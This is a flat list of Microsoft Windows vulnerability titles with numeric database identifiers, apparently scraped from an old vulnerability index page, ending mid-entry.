Microsoft Windows Web Services on Devices API (WSDAPI) Message Header Handling Memory Corruption [59856] Microsoft Windows Active Directory Malformed LDAP Request Stack Exhaustion Remote DoS [59855] Microsoft Windows License Logging Server (llssrv.exe) RPC LlsrLicenseRequestW Method Remote Overflow [59819] Microsoft Windows RPC Session Handle Hijacking Remote Privilege Escalation [59738] Microsoft Windows ZIP Filename Handling Overflow DoS [59736] Microsoft Windows Media Player (WMP) on Solaris Installation Permission Weakness Local Privilege Escalation [59734] Microsoft Windows Log Clearning Function Admin Notification Weakness [59733] Microsoft Windows 2000 Terminal Services Screensaver Screen Minimization Locking Weakness [59732] Microsoft Windows Screensaver Domain Account Lock Verification Local Brute Force Weakness [59731] Microsoft Windows 2000 DCOM Client Alter Context Request Remote Information Disclosure [59730] Microsoft Windows 2000 Terminal Services Disconnect Feature Local Privilege Escalation [59515] Microsoft Windows csrss.exe Command Prompt Input Manipulation Forced Reboot DoS [59514] Microsoft Windows 2000 Task Manager Uppercase Process Name Termination Weakness [59513] Microsoft Windows NT winnt/system32 Write Access Local DoS (NT4ALL) [59509] Microsoft Windows 2000 Encrypted File System Cleartext Backup File Local Disclosure [59347] Microsoft Windows SYSKEY Registry EFS Startup Key Disclosure [59346] Microsoft Windows 2000 Crafted TCP/UDP Traffic CPU Consumption Remote DoS [59340] Microsoft Windows NT Logon Box Account Name Disclosure [59333] Microsoft Windows NT Winlogon Key Local Shutdown DoS [59325] Microsoft Windows NT Scheduler Drive Mapping Permission Weakness Local Privilege Escalation [59264] Microsoft Windows Crafted Fragmented Packet Stream Remote DoS (Jolt) [59260] Microsoft Windows NT SNMP Agent Query Saturation Remote DoS [59250] Microsoft Windows NT Fragmented Packet Handling Remote DoS (ntfrag) [59241] Microsoft Windows CreateRemoteThread Function Arbitrary Writeable Process Termination DoS [58876] Microsoft Windows SMB Packet Command Value Handling Remote Code Execution [58875] Microsoft Windows SMBv2 Packet Handling Infinitie Loop Remote DoS [58862] Microsoft Windows LSASS Malformed NTLM Authentication Packets Remote Overflow DoS [58861] Microsoft Windows Kernel Exception Handler Unspecified Local DoS [58860] Microsoft Windows Kernel User Mode PE File Handling NULL Dereference Local Privilege Escalation [58859] Microsoft Windows Kernel 64-bit Value Conversion Truncation Local Privilege Escalation [58856] Microsoft Windows CryptoAPI X.509 Certificate Object Identifier Handling Overflow Spoofing Weakness [58855] Microsoft Windows CryptoAPI X.509 Certificate Common Name Null Truncation Spoofing [58854] Microsoft Windows Indexing Service ActiveX Memory Corruption Arbitrary Code Execution [58845] Microsoft Windows Media Runtime Compressed Audio File Handling Heap Corruption Arbitrary Code Execution [58844] Microsoft Windows Media Player ASF Runtime Voice Sample Rate Handling Arbitrary Code Execution [58843] Microsoft Windows Media Player ASF Handling Overflow [58786] Microsoft Windows User Profile Unloading Session Persistence Weakness [58785] Microsoft Windows MFC Component (MFC42u.dll) AfxOleSetEditMenu Function RTF Malformed OLE Object Handling Overflow [57806] Microsoft Windows Wireless LAN AutoConfig Service (wlansvc) Frame Parsing Arbitrary Code Execution [57803] Microsoft Windows Media MP3 File Handling Memory Corruption [57802] Microsoft Windows Media ASF Header Parsing Invalid Free Arbitrary Code Execution [57799] Microsoft Windows srv2.sys Kernel Driver SMB2 Malformed NEGOTIATE PROTOCOL REQUEST Remote DoS [57798] Microsoft Windows DHTML Editing Component ActiveX Arbitrary Code Execution [57797] Microsoft Windows TCP/IP Orphaned Connection Handling Remote DoS [57796] Microsoft Windows TCP/IP Packet State Information Handling Remote Code Execution [57795] Microsoft Windows TCP/IP Implementation Queue Connection Saturation TCP State Table Remote DoS [57016] Microsoft Windows win32k.sys Embedded OpenType Font Handling DoS [56912] Microsoft Windows Terminal Services Client ActiveX Unspecified Overflow [56909] Microsoft Windows AVI Media File Parsing Unspecified Overflow [56908] Microsoft Windows Malformed AVI Header Parsing Arbitrary Code Execution [56904] Microsoft Windows Telnet NTLM Credential Reflection Remote Access [56902] Microsoft Windows Workstation Service NetrGetJoinInformation Function Local Memory Corruption Arbitrary Code Execution [56901] Microsoft Windows Message Queuing Service (MSMQ) mqac.sys IOCTL Request Parsing Local Privilege Escalation [56900] Microsoft Windows Internet Name Service (WINS) Network Packet Handling Remote Integer Overflow [56899] Microsoft Windows Internet Name Service (WINS) Push Request Handling Remote Overflow [56780] Microsoft Windows win32k.sys NtUserConsoleControl Function Memory Manipulation Local Privilege Escalation [56516] Microsoft Windows lpCmdLine Filename Whitespace Handling Weakness [56514] Microsoft Windows gzip Libraries Unspecified Remote Code Execution [56513] Microsoft Windows Autorun / NoDriveTypeAutoRun Registry Value Enforcement Weakness [55843] Microsoft Windows Embedded OpenType (EOT) Font Name Tables Parsing Overflow [55842] Microsoft Windows Embedded OpenType (EOT) Font Data Record Parsing Overflow [55645] Microsoft Windows Live Messenger (WLM) msnmsgr.exe Malformed Content-Type Header Remote DoS [55644] Microsoft Windows Live Messenger Client MSN Protocol over NAT Multiple Header Field Internal IP Disclosure [55332] Microsoft Windows PPTP Server (Raspptpe.sys) Malformed Control Packet Remote DoS [55309] Microsoft Windows ICMP Type 9 Packet Remote DoS [55050] Microsoft Windows win32k.sys Thread Handling Local Race Condition DoS [54961] Microsoft Office PowerPoint Freelance Windows Translator (FL21WIN.DLL) Layout Parsing Overflow [54943] Microsoft Windows Kernel Desktop Parameter Manipulation Local Privilege Escalation [54942] Microsoft Windows Kernel Driver Class Registration Local Privilege Escalation [54941] Microsoft Windows Kernel User Mode Pointer Passing Local Privilege Escalation [54940] Microsoft Windows Kernel Desktop Object Manipulation Local Privilege Escalation [54939] Microsoft Office Works for Windows File Converter .wps Handling Overflow [54938] Microsoft Windows Active Directory Crafted LDAP(S) Request Handling Remote DoS [54937] Microsoft Windows Active Directory Crafted LDAP(S) Request Hexdecimal DN AttributeValue Handling Arbitrary Code Execution [54936] Microsoft Windows RPC Marshalling Engine Internal State Manipulation Remote Code Execution [54935] Microsoft Windows MSHTML Search Preview Display Information Disclosure [54934] Microsoft Windows Print Spooler Load Library Crafted RPC Message Arbitrary DLL Loading Privilege Escalation [54933] Microsoft Windows Print Spooler Crafted Separator Page Arbitrary Local File Disclosure [54932] Microsoft Windows Print Spooler win32spl.dll EnumeratePrintShares Function Remote Overflow [54931] Microsoft Windows SystemParametersInfo() Function SPI_DESKWALLPAPER Call Local DoS [54191] Microsoft Windows GDI+ PNG File Handling Infinite Loop DoS [53804] Microsoft Windows Media Player MID File Handling Overflow DoS [53668] Microsoft Windows ThreadPool ACL Enforcement Weakness Local Privilege Escalation [53667] Microsoft Windows RPCSS Service Isolation Local Privilege Escalation [53666] Microsoft Windows Management Instrumentation (WMI) Service Isolation Local Privilege Escalation [53623] Microsoft Windows SearchPath File Open / Locating Unspecified Arbitrary Code Execution [53621] Microsoft Windows HTTP Services Digital Certificate Distinguished Name Mismatch Weakness [53620] Microsoft Windows HTTP Services Web Server Response Unspecified Integer Underflow [53619] Microsoft Windows HTTP Services NTLM Credential Replay Privileged Code Execution [53533] Microsoft Windows Task Manager (taskmgr.exe) I/O Activity Local Information Disclosure [53309] Microsoft Windows WINS 1Ch Registration Domain Controller Manipulation [53248] Microsoft Windows DNS Server Crafted Packets Remote Memory Consumption DoS [52892] Microsoft IE on Windows Link Click Unspecified Arbitrary Code Execution (PWN2OWN) [52694] Microsoft Windows Media Player Malformed GET Request DoS [52693] Microsoft Windows Mobile Bluetooth Stack OBEX FTP Service Traversal Arbitrary File Manipulation [52685] Microsoft Windows FTP Client Multiple Command Overflows [52683] Microsoft Windows explorer.exe Malformed PNG Handling DoS [52682] Microsoft Windows Explorer ZIP Handler DoS [52681] Microsoft Windows Firewall sessmgr.exe Port Restriction Local Bypass [52524] Microsoft Windows Invalid Pointer Local Privilege Escalation [52523] Microsoft Windows Handle Validation Local Privilege Escalation [52522] Microsoft Windows GDI Kernel Component Unspecified Remote Code Execution [52521] Microsoft Windows SChannel Certificate Based Authentication Spoofing Bypass [52520] Microsoft Windows WPAD WINS Server Registration Web Proxy MiTM Weakness [52519] Microsoft Windows DNS Server WPAD Registration Dynamic Update MiTM Weakness [52518] Microsoft Windows DNS Server Response Response Validation Transaction ID Prediction Weakness [52517] Microsoft Windows DNS Server Query Validation Spoofing [51433] Microsoft Windows Crafted CHM File Handling Overflow [51133] Microsoft Windows Media Player Multiple File Handling Remote Overflow [50567] Microsoft Windows WordPad Text Converter Unspecified Memory Corruption [50566] Microsoft Windows Explorer search-ms Protocol Handler Arbitrary Code Execution [50565] Microsoft Windows Explorer Saved Search File Handling Arbitrary Code Execution [50562] Microsoft Windows GDI WMF Image Size Parameter Parsing Overflow [50561] Microsoft Windows GDI WMF Image Parsing Integer Math Overflow [50559] Microsoft Windows Media Component Crafted ISATAP Address NTLM Credential Disclosure [50558] Microsoft Windows Media Component Service Principal Name (SPN) Credential Reflection Arbitrary Code Execution [50533] Microsoft Windows Media Services nskey.dll ActiveX CallHTMLHelp Method Overflow [50287] Microsoft Windows Vista iphlpapi.dll CreateIpForwardEntry2() Function Memory Corruption [50280] Microsoft Windows UnhookWindowsHookEx Call Saturation Race Condition Local DoS [50252] Microsoft Windows Media Player Crafted DAT File MThd Header Handling DoS [50251] Microsoft Windows Media Player Crafted MIDI File MThd Header Handling DoS [50000] Microsoft Windows Active Directory LDAP Server Bind Request User Account Enumeration [49897] Microsoft Windows Explorer Crafted ZIP File Handling DoS [49895] Microsoft Windows GDI+ gdiplus.dll Crafted ICO File Handling DoS [49736] Microsoft Windows SMB NTLM Authentication Credential Replay Remote Code Execution [49364] Cisco PIX / ASA Microsoft Windows NT VPN Domain Authentication Bypass [49243] Microsoft Windows Server Service Crafted RPC Request Handling Unspecified Remote Code Execution [49061] Microsoft Windows Ancillary Function Driver (afd.sys) Local Privilege Escalation [49060] Microsoft Windows Message Queuing Service RPC Request Handling Remote Code Execution [49058] Microsoft Windows Active Directory LDAP(S) Request Handling Remote Overflow [49057] Microsoft Windows SMB File Name Handling Remote Underflow [49056] Microsoft Windows Kernel Memory Corruption Local Privilege Escalation [49055] Microsoft Windows Kernel New Window Creation Process Arbitrary Code Execution [49054] Microsoft Windows Kernel Double-free Unspecified Local Privilege Escalation [49053] Microsoft Windows Virtual Address Descriptors (VAD) Local Privilege Escalation [48837] Microsoft Windows Vista Page Fault Handling DoS [48789] Microsoft Windows Mobile Bluetooth Device Name Overflow DoS [48359] Microsoft Windows Vista ASLR / DEP Memory Protection Bypass [48302] Microsoft Windows nslookup.exe DNS Zone Transfer Request Unspecified Arbitrary Code Execution [48153] Microsoft Windows srv.sys WRITE_ANDX SMB Packet Handling Remote DoS [48037] Microsoft Windows Image Acquisition Logger ActiveX Open Method Arbitrary File Download [48009] Microsoft Windows Kernel IopfCompleteRequest API Overflow [47963] Microsoft Windows Media Player Audio File Sampling Rate Remote Code Execution [47962] Microsoft Windows Media Encoder wmex.dll ActiveX Overflow [47412] Microsoft Windows Event System Crafted Request Array Index Handling Remote Privilege Escalation [47411] Microsoft Windows Event System Per-user Subscription Crafted Request Remote Privilege Escalation [47403] Microsoft Windows Messenger ActiveX (Messenger.UIAutomation.1) Remote Privileged Operations [47396] Microsoft Windows IPsec Policy Import Failure Cleartext Remote Information Disclosure [47395] Microsoft Windows Image Color Management System (MSCMS) mscms.dll InternalOpenColorProfile Function ICM Image File Handling Overflow [46990] Microsoft Windows Explorer (explorer.exe) Unspecified WMF Handling DoS [46801] Microsoft Windows Calendar Malformed ICS File Handling DoS [46778] Microsoft Windows DNS Query ID Field Prediction Cache Poisoning [46777] Microsoft Windows DNS Socket Entropy Weakness Cache Poisoning [46774] Microsoft Windows Explorer Saved Search File Handling DoS [46210] Microsoft Windows Installer msiexec.exe /uninstall Option GUID Value Overflow [46068] Microsoft Windows Pragmatic General Multicast (PGM) Fragment Handling Remote DoS [46067] Microsoft Windows Pragmatic General Multicast (PGM) Packet Handling Remote DoS [46066] Microsoft Windows Active Directory LDAP Request Processing Remote DoS [46063] Microsoft Windows Internet Name Service (WINS) Packet Handling Local Privilege Escalation [46062] Microsoft Windows Speech Components (sapi.dll) Speech Recognition Code Execution [46061] Microsoft Windows Bluetooth SDP Packet Processing Remote Code Execution [45809] Microsoft Windows Vista Kernel Unspecified Remote Issue [45523] Microsoft Windows Live Messenger GDI Engine Malformed File Handling Overflow [45521] Microsoft Windows Explorer (explorer.exe) Malformed PNG Handling Remote DoS [45280] Microsoft Windows Media Player (WMP) mplay32.exe MP3 Filename Handling Local Overflow [45048] Microsoft Windows XP I2O Utility Filter Driver (i2omgmt.sys) Local Privilege Escalation [44975] Microsoft Windows CE GIF Imaging Component Unspecified Arbitrary Code Execution [44974] Microsoft Windows CE JPEG (GDI+) Handling Unspecified Arbitrary Code Execution [44880] Microsoft Windows msjet40.dll MDB File Handling Overflow [44580] Microsoft Windows Microsoft Distributed Transaction Coordinator (MSDTC) SeImpersonatePrivilege User Right Local Privilege Escalation [44215] Microsoft Windows GDI EMF Filename Parameter Handling Overflow [44214] Microsoft Windows GDI WMF Handling CreateDIBPatternBrushPt Function Overflow [44213] Microsoft Windows GDI (gdi32.dll) EMF File Handling Multiple Overflows [44206] Microsoft Windows Kernel Unspecified Privilege Escalation [44200] Microsoft Windows Random Number Generator (RNG) CryptGenRandom Function Prediction Weakness [44172] Microsoft Windows DNS Client Predictable Transaction ID Spoofing [44171] Microsoft Windows HxTocCtrl ActiveX (hxvz.dll) Memory Corruption [44018] Microsoft Windows Vista SP1 Page Protection Unspecified Bypass [43773] Microsoft Windows Explorer (explorer.exe) GIF File Handling Remote DoS [43715] Microsoft Windows Media Player (WMP) AIFF File Handling DoS [43603] Microsoft Windows DNS Server Dynamic Update Mechanism Client Authentication Bypass [43434] Microsoft Windows Vista NoDriveTypeAutoRun Auto-Play Bypass [43307] Microsoft Windows Explorer (explorer.exe) AVI Handling Right-Click Action DoS [42579] 3ivx MPEG-4 on Microsoft Windows Media Player (WMP) mplayer2.exe MP4 File Handling Overflow [41553] Microsoft Windows Explorer BMP Width Dimension Handling Overflow [41491] Microsoft Windows Vista Crafted DHCP Response DoS [41463] Microsoft Windows OLE Automation Unspecified Memory Corruption Remote Code Execution [41156] Microsoft Windows x64 Kernel PatchGuard Bypass [41155] Microsoft Windows Hardware-enforced DEP Bypass [41154] Microsoft Windows XP EFS Cleartext Password Storage [41097] Microsoft Windows Task Scheduler (at.exe) Local Privilege Escalation [41093] Microsoft Windows Media Player (WMP) MSIE Static Invocation HTML Rendering Weakness [41092] Microsoft Windows DNS Service Predictable Transaction ID Weakness [41090] Microsoft Windows w/ IE7 Shell32.dll Crafted URL Third-party Application Arbitrary Command Execution [41065] Microsoft Windows kernel32.dll Multiple Function DoS [41064] Microsoft Windows ntdll.dll Multiple Function DoS [41059] Microsoft Windows ARP Saturation Remote DoS [40071] Microsoft Windows LSASS Crafted LPC Request Local Privilege Escalation [40070] Microsoft Windows TCP/IP IGMPv3 / MLDv2 Packet Handling Remote Code Execution [40069] Microsoft Windows TCP/IP ICMP RDP Packet Handling Remote DoS [39521] Cisco Security Agent for Microsoft Windows Crafted SMB Packet Remote Overflow [39131] Microsoft Windows Media Player Crafted AU File Application Crash Remote DoS [39127] Microsoft Windows DirectX WAV / AVI File Parsing Arbitrary Code Execution [39126] Microsoft Windows DirectX SAMI File Parsing Arbitrary Code Execution [39125] Microsoft Windows Vista SMBv2 Signing Unspecified Remote Code Execution [39124] Microsoft Windows Vista Kernel Legacy Reply Path Validation Local Privilege Escalation [39123] Microsoft Windows Message Queuing MSMQ Message Handling Arbitrary Code Execution [39122] Microsoft Windows Media Format Runtime ASF Parsing Arbitrary Code Execution [39014] Microsoft Windows RunAs Command Local Arbitrary Process DoS [38991] Microsoft Windows PNG Image IHDR block Multiple Crafted Value Remote DoS [38499] Microsoft Windows Mobile ActiveSync USB Weak PIN/Password Encryption [38494] Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) ICO Handling DoS [37637] Microsoft Windows Crafted HLP File Overflow [37635] Microsoft Windows Virtual DOS Machine (VDM) PhysicalMemory Race Condition Local Privilege Escalation [37631] Microsoft Windows Malformed NNTP Response Remote Memory Corruption [37629] Microsoft Windows 2000 RPC Authentication Unspecified Information Disclosure [37628] Microsoft Windows 2000 RPC Authentication Crafted Request Remote DoS [37627] Microsoft Windows Kodak Image Viewer Image File Handling Arbitrary Code Execution [37105] Microsoft Windows mfc42.dll / mfc42u.dll CFileFind Class FindFile() Function Overflow [36938] Microsoft Windows XP Kernel Process Scheduler Local DoS [36937] Microsoft Windows / IE ActiveX (triedit.dll) Multiple Property NULL Pointer DoS [36935] Microsoft Windows Services for UNIX Local Privilege Escalation [36393] Microsoft Windows Vista Weather Gadgets Crafted HTML Attribute Unspecified Issue [36392] Microsoft Windows Vista Contacts Gadget Crafted Contact Information Arbitrary Code Execution [36391] Microsoft Windows Vista Feed Headlines Gadgets RSS Feed XSS [36390] Microsoft Windows Vector Markup Language (VML) VGX.DLL CDownloadSink Class Overflow [36388] Microsoft Windows Graphics Rendering Engine (GDI) Metafile Image Handling Overflow [36387] Microsoft Windows OLE Automation TextNode Object substringData Method Overflow [36386] Microsoft Windows Media Player Skin File Handling Crafted Header Arbitrary Code Execution [36385] Microsoft Windows Media Player Skin File Handling Overflow [36149] Microsoft IE on Windows Mobile Unspecified Overflow DoS [36148] Microsoft Windows Mobile Pictures and Videos Malformed JPEG DoS [36146] Microsoft Windows Terminal Services TLS Downgrade Weakness [36145] Microsoft Windows Event Viewer (eventvwr.exe) Log Data Exclusion [36144] Microsoft Windows Bluetooth Unspecified Remote Privilege Escalation [36143] Microsoft Windows Mobile Pocket PC Edition Unspecified Remote Privilege Escalation [36141] Microsoft Windows Explorer Ole32.dll Crafted Document Summary Information DoS [36138] Microsoft Windows Active Directory Time Restriction User Enumeration [35962] Microsoft Windows XP Registry QHEADLES Permission Weakness [35961] Microsoft Windows Active Directory LDAP Service Crafted Request Remote DoS [35960] Microsoft Windows Active Directory LDAP Service Convertible Attribute Remote Code Execution [35952] Microsoft Windows Vista Teredo Crafted IPv6 Traffic Blocking Rule Bypass [35637] Microsoft Windows Unspecified Remote Code Execution [35347] Microsoft Windows Schannel Security Package Crafted Digital Signature Arbitrary Code Execution [35346] Microsoft Outlook Express / Windows Mail MHTML Content Disposition Parsing Cross Domain Information Disclosure [35345] Microsoft Outlook Express / Windows Mail URL Parsing Cross Domain Information Disclosure [35344] Microsoft Windows Vista Local User Information Data Stores Information Disclosure [35341] Microsoft Windows Win32 API Unspecified Remote Code Execution [34490] Microsoft Windows Explorer Folder Browsing WMV Handling DoS [34103] Microsoft Windows Web Proxy Autodiscovery Protocol (WPAD) DNS Subversion [34102] Microsoft Windows Vista Mail Client Crafted Link Arbitrary Program Execution [34101] Microsoft Windows XP winmm.dll mmioRead Function DoS [34100] Microsoft Windows DNS RPC Interface Zone Name Remote Overflow [34099] Microsoft Windows TrueType Fonts Rasterizer Local Privilege Escalation [34098] Microsoft Windows GDI Functions Windows Metafile (WMF) Handling DoS [34097] Microsoft Windows GDI Enhanced Metafile (EMF) Handling Local Privilege Escalation [34096] Microsoft Windows GDI Invalid Window Size Local Privilege Escalation [34095] Microsoft Windows GDI Crafted Image Local Privilege Escalation [34011] Microsoft Windows Kernel Mapped Memory Local Privilege Escalation [34010] Microsoft Windows XP UPnP Remote Memory Corruption [34009] Microsoft Windows Agent URL Parsing Memory Corruption [34008] Microsoft Windows Vista CSRSS Local Privilege Escalation [33668] Microsoft Windows Vista Meeting Space DFSR.exe TCP Connection Persistence [33667] Microsoft Windows Vista Persistent Established Teredo Address [33666] Microsoft Windows Vista Teredo nonce Spoofing [33665] Microsoft Windows Vista Neighbor Discovery Crafted Neighbor Advertisement Redirect [33664] Microsoft Windows Vista Crafted Gratuitous ARP Overwrite DoS [33663] Microsoft Windows Vista LLTD Mapper HELLO Packet Spoofing [33662] Microsoft Windows Vista LLTD Mapper Real Source Field Host Spoofing [33661] Microsoft Windows Vista LLTD Responder Race Condition Host Spoofing [33660] Microsoft Windows Vista LLTD Mapper EMIT Packet Gathering Remote DoS [33635] AMD ATI Radeon for Microsoft Windows Vista atikmdag.sys Kernel Mode Driver DoS [33628] Microsoft Windows NDISTAPI.sys Permission Weakness Local DoS [33474] Microsoft Windows ReadDirectoryChangesW API Function File System Information Disclosure [33307] Microsoft Windows Media MID Malformed Header Chunk DoS [33306] Microsoft Windows Explorer explorer.exe WMV File Handling DoS [33219] Microsoft Windows Live Messenger Gestual Emoticon Saturation CPU Consumption DoS [32629] Microsoft IE on Windows Mobile Malformed WML Page Unspecified DoS [32628] Microsoft Windows / IE ActiveX (mshtml.dll) Multiple Property NULL Pointer DoS [32445] Microsoft Windows Workstation Service NetrWkstaUserEnum RPC Request DoS [31897] Microsoft Windows CSRSS NtRaiseHardError Function Arbitrary Memory Disclosure [31890] Microsoft Windows Shell New Hardware Local Privilege Escalation [31889] Microsoft Windows XP SP2 Image Aquisition Service Local Privilege Escalation [31885] Microsoft Windows OLE Dialog Memory Corruption Remote Code Execution [31884] Microsoft Windows HTML Help ActiveX Control Arbitrary Code Execution [31659] Microsoft Windows CSRSS MessageBox Function Privilege Escalation [31645] Microsoft Windows DNS Recursive Query DoS [30997] Microsoft Windows .manifest File Handling Local DoS [30871] Microsoft Windows DRM drmstor.dll ActiveX Object StoreLicense Function Memory Corruption [30823] Microsoft Windows Print Spooler (spoolsv.exe) RpcGetPrinterData Function DoS [30821] Microsoft Outlook Express Windows Address Book Contact Record Code Execution [30819] Microsoft Windows Media Player ASX Playlist Handling Overflow [30818] Microsoft Windows Media Player ASF Parsing Overflow [30817] Microsoft Windows Remote Installation Service TFTP Arbitrary File Overwrite [30811] Microsoft Windows SNMP Service Remote Overflow [30405] Microsoft Windows Active Directory Unspecified DoS [30263] Microsoft Windows Workstation Service Crafted Message Remote Overflow [30262] Microsoft Windows Agent ACF File Handling Memory Corruption [30261] Microsoft Windows Client Service for NetWare (CSNW) Crafted Message Remote DoS [30260] Microsoft Windows Client Service for NetWare (CSNW) Crafted Message Remote Code Execution [30214] Microsoft Windows GDI Kernel Structure Modification Code Execution [30096] Microsoft Windows NAT Helper Components ipnathlp.dll with ICS Malformed DNS Query DoS [29529] Microsoft Windows 2000 creator.dll ActiveX COM Object Memory Corruption [29528] Microsoft Windows 2000 msdxm.ocx ActiveX COM Object Memory Corruption [29527] Microsoft Windows 2000 myinfo.dll ActiveX COM Object Memory Corruption [29526] Microsoft Windows 2000 ciodm.dll ActiveX COM Object Memory Corruption [29439] Microsoft Windows Server Service Crafted SMB Packet Unspecified Issue [29424] Microsoft Windows Object Packager File Extension Dialog Spoofing [29409] Microsoft Windows TCP 135 Crafted Packet Saturation DoS [29351] Microsoft Windows Terminal Services tsuserex.dll COM Object Instantiation [29231] Microsoft Windows Help File Viewer (winhlp32.exe) HLP File Arbitrary Code Execution [29128] Microsoft Windows gdiplus.dll Divide-by-zero DoS [28731] Microsoft Windows Pragmatic General Multicast (PGM) Multicast Message Arbitrary Code Execution [28729] Microsoft Windows Indexing Service Unspecified XSS [28372] Microsoft Windows Explorer URL Passing Recursive file Tag Local DoS [28208] Microsoft Windows Live Messenger Contact List .ctt File Heap Overflow [27848] Microsoft Windows Kernel Unspecified Local Privilege Escalation [27847] Microsoft Windows Unhandled Exception Unspecified Remote Code Execution [27846] Microsoft Windows Winlogon Search Path Subversion Local Privilege Escalation [27845] Microsoft Windows Server Service Crafted RPC Message Remote Overflow [27844] Microsoft Windows DNS Client Service Record Response Overflow [27843] Microsoft Windows Winsock API Hostname Remote Code Execution [27797] Microsoft Windows GDI library (gdi32.dll) createBrushIndirect Function WMF Parsing DoS [27644] Microsoft Windows Server Driver (srv.sys) Crafted SMB Packet NULL Dereference DoS [27155] Microsoft Windows Server Service SRV.SYS Crafted Request SMB Information Disclosure [27154] Microsoft Windows Server Service SRV.SYS First-class Mailslot Message Remote Overflow [27152] Microsoft Windows IIS ASP Page Processing Overflow [27151] Microsoft Windows DHCP Client Service Crafted Response Overflow [26440] Microsoft Windows SMB MrxSmbCscIoctlOpenForCopyChunk Function Overflow [26439] Microsoft Windows SMB MRXSMB.SYS MrxSmbCscIoctlCloseForCopyChunk Remote DoS [26438] Microsoft Windows RPC Mutual Authentication Server Spoofing [26437] Microsoft Windows RRAS RASMAN Remote Overflow [26436] Microsoft Windows RASMAN RPC Request Remote Overflow [26433] Microsoft Windows TCP/IP Protocol Driver Source Routing Overflow [26432] Microsoft Windows jgdw400.dll ART Image Rendering Overflow [26431] Microsoft Windows Graphics Rendering Engine PolyPolygon Function Overflow [26430] Microsoft Windows Media Player PNG Processing Overflow [25949] Microsoft Windows INETCOMM.DLL mhtml: URI Overflow [25761] Microsoft Windows NTDLL.DLL RtlDosPathNameToNtPathName_U API Path Conversion Weakness [25501] Microsoft Windows itss.dll CHM Processing Overflow [25336] Microsoft Windows Distributed Transaction Coordinator (DTC) BuildContextW Request DoS [25335] Microsoft Windows Distributed Transaction Coordinator (DTC) CRpcIoManagerServer::BuildContext Function Remote Overflow [24802] Microsoft Windows Help winhlp32.exe Embedded Image Processing Overflow [24519] Microsoft Outlook Express Windows Address Book (.wab) Processing Overflow [24516] Microsoft Windows Explorer COM Object Handling Remote Code Execution [23136] Microsoft Windows/Office Korean Input Method Editor (IME) ShellAbout() Privilege Escalation [23134] Microsoft Windows Web Client Service Crafted WebDAV Request Overflow [23133] Microsoft Windows IGMPv3 Crafted Packet Remote DoS [23132] Microsoft Windows Media Player Plug-in Malformed EMBED Element Arbitrary Code Execution [23131] Microsoft Windows Media Player Bitmap File Processing Overflow [23047] Microsoft Windows SSDP SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23046] Microsoft Windows SCardSvr SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23045] Microsoft Windows NetBT SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23044] Microsoft Windows UPnP SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [22710] Microsoft Windows Ad-hoc Network Advertisement Weakness [22697] Microsoft Windows Unspecified Display Driver Large Image Processing DoS [22396] Microsoft Windows WMF Processing ExtEscape POSTSCRIPT_INJECTION Function Overflow DoS [22371] Microsoft Windows WMF Processing ExtCreateRegion Function Overflow DoS [21987] Microsoft Windows Shimgvw.dll SETABORTPROC Function Crafted WMF Arbitrary Code Execution [21598] Microsoft Windows 2000 NetBIOS Port Malformed TCP Packet Parsing Remote DoS [21536] Microsoft Windows backup File Name Extension Overflow [21510] Microsoft Windows SynAttackProtect Bypass [20916] Microsoft Windows UPnP GetDeviceList Remote DoS [20875] Microsoft Windows XP Professional Upgrade MSIE Rollback [20580] Microsoft Windows GetEnhMetaFilePaletteEntries() EMF File Rendering DoS [20579] Microsoft Windows GDI Metafile SetPalette Entries Overflow [20497] Microsoft Windows 98SE User32.dll Icon DoS [20367] Microsoft Windows XP Fast User Switching Arbitrary Account Lockout [20366] Microsoft Windows XP Remote Desktop Client Cleartext Account Name Transmission [20364] Microsoft Windows keybd_event Validation Privilege Escalation [20356] Microsoft Windows Win32k.sys ShowWindow Function Local DoS [20279] Microsoft Windows ME ssdpsrv.exe Crafted SSDP Message DoS [20256] Microsoft Windows 2000 NTFS Volume Macintosh Client Directory Permission Modification [20222] Microsoft Windows 2000 runas.exe Named Pipe Spoofing Information Disclosure [20221] Microsoft Windows 2000 runas.exe Named Pipe Single Thread DoS [20220] Microsoft Windows 2000 runas.exe Cleartext Authentication Information Disclosure [20188] Microsoft Windows Crafted SMB SMBnegprots Request DOS [20148] Microsoft Windows smbmount Directory Manipulation Saturation DoS [20028] Microsoft Windows XP SP2 TFTP Local Overflow [20002] Microsoft Windows 2000 CHKDSK Fix Mode File ACL Failure [20001] Microsoft Windows 2000 Terminal Service Client Connection IP Logging Failure [20000] Microsoft Windows 2000 Domain Administrator Computer Lock Bypass [19999] Microsoft Windows 2000 FQDN Domain Login Password Expiry Bypass [19998] Microsoft Windows 2000 UPN Credentialed Login Group Policy Failure [19997] Microsoft Windows 2000 WideCharToMultiByte Function String Termination Issue [19996] Microsoft Windows 2000 Event ID 1704 Group Policy Failure [19995] Microsoft Windows 2000 SECEDIT Long Folder ACL Set Issue [19994] Microsoft Windows 2000 audit directory service access 565 Event Logging Failure [19993] Microsoft Windows 2000 LDAPS CA Trust Issue [19922] Microsoft Windows Client Service for NetWare (CSNW) Remote Overflow [19904] Microsoft Windows DTC Packet Relay DoS [19903] Microsoft Windows DTC Transaction Internet Protocol (TIP) DoS [19902] Microsoft Windows COM+ Remote Code Execution [19901] Microsoft Windows FTP Client Arbitrary File Write [19900] Microsoft Windows Shell Crafted .lnk File Arbitrary Code Execution (2005-2122) [19899] Microsoft Windows Shell Crafted .lnk File Arbitrary Code Execution (2005-2118) [19898] Microsoft Windows Web View Arbitrary Script Injection [19873] Microsoft Windows XP Wireless Zero Configuration Credential/Key Disclosure [19857] Microsoft Windows SeDebugPrivilege NtSystemDebugControl Function Privilege Escalation [19775] Microsoft Windows XP ISAKMP UDP Saturation DoS [19764] Microsoft Windows XP Malformed explorer.exe.manifest Local DoS [19287] Microsoft Windows Firewall Malformed Registry Entry Ruleset Exception Weakness [19187] Microsoft Windows NT/2000 DNS Server Non-delegated NS Glue Record Cache Poisoning [19185] Microsoft Windows XP Internet Connection Firewall sessmgr.exe Accss Control Bypass [19007] Microsoft Windows 95 smbclient Triple Dot Traversal Arbitrary Command Execution [19006] Microsoft Windows NT snmp.exe Malformed OID Packet Saturation DoS [18956] Microsoft Windows Registry Editor (Regedt32.exe) Long String Obfuscation [18830] Microsoft Windows UMPNPMGR wsprintfW Remote Overflow [18829] Microsoft Windows Open Type (EOT) Font Handling Remote Overflow [18828] Microsoft Windows Distributed Transaction 